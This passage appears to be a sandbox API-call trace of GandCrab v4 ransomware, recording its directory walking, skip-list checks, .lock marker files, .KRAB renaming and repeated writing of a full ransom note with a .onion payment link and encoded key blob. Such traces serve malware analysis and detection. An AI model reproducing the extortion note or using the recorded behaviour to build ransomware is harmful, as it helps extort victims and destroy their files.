KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0098.094] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0098.098] CloseHandle (hObject=0x320) returned 1 [0098.098] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.099] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.099] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2d, wMilliseconds=0x12d)) [0098.099] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.099] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0098.099] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0098.099] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\d2ca4a08d2ca4dee3d.lock") returned 57 [0098.099] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\saved games\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0098.166] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.167] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.167] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\") returned 34 [0098.167] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\*" [0098.167] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbd920 [0098.167] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0098.167] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.167] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0098.167] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0098.167] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.167] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0098.167] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0098.167] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\d2ca4a08d2ca4dee3d.lock" [0098.167] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.168] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 62 [0098.168] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\d2ca4a08d2ca4dee3d.lock") returned 57 [0098.168] lstrlenW (lpString=".lock") returned 5 [0098.168] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.168] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0098.168] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.168] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.168] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.168] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0098.168] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0098.168] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\desktop.ini" [0098.168] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.169] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\desktop.ini.KRAB") returned 50 [0098.169] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\desktop.ini") returned 45 [0098.169] lstrlenW (lpString=".ini") returned 4 [0098.169] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.169] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0098.169] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.169] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\desktop.ini") returned 45 [0098.169] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\desktop.ini") returned 45 [0098.169] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0098.169] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.170] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.170] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0098.170] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0098.170] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\KRAB-DECRYPT.txt" [0098.170] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.170] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\KRAB-DECRYPT.txt.KRAB") returned 55 [0098.170] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\KRAB-DECRYPT.txt") returned 50 [0098.170] lstrlenW (lpString=".txt") returned 4 [0098.170] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.170] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0098.170] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.171] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\KRAB-DECRYPT.txt") returned 50 [0098.171] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\KRAB-DECRYPT.txt") returned 50 [0098.171] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0098.171] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0098.171] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0098.171] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0098.171] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0098.171] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0098.171] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0098.171] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0098.171] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0098.171] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0098.171] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.171] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0098.171] FindClose (in: hFindFile=0xfbd920 | out: hFindFile=0xfbd920) returned 1 [0098.171] CloseHandle (hObject=0x320) returned 1 [0098.171] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0098.172] lstrcmpW (lpString1="Searches", lpString2=".") returned 1 [0098.172] lstrcmpW (lpString1="Searches", lpString2="..") returned 1 [0098.172] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Searches" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches" [0098.172] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches\\" [0098.172] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0098.172] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0098.172] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0098.172] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0098.172] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0098.172] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.172] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.236] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\\\KRAB-DECRYPT.txt") returned 48 [0098.236] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Searches\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\searches\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0098.271] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0098.271] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0098.272] CloseHandle (hObject=0x320) returned 1 [0098.272] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.272] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.273] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2d, wMilliseconds=0x1d9)) [0098.273] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.273] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0098.273] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0098.273] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\d2ca4a08d2ca4dee3d.lock") returned 54 [0098.273] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Searches\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\searches\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0098.274] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.274] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.274] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\") returned 31 [0098.275] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches\\*" [0098.275] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Searches\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbd920 [0098.275] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0098.275] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.275] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0098.275] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0098.275] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.275] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0098.275] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0098.275] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches\\d2ca4a08d2ca4dee3d.lock" [0098.275] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.275] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 59 [0098.275] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\d2ca4a08d2ca4dee3d.lock") returned 54 [0098.275] lstrlenW (lpString=".lock") returned 5 [0098.276] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.276] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0098.276] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.276] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.276] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.276] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 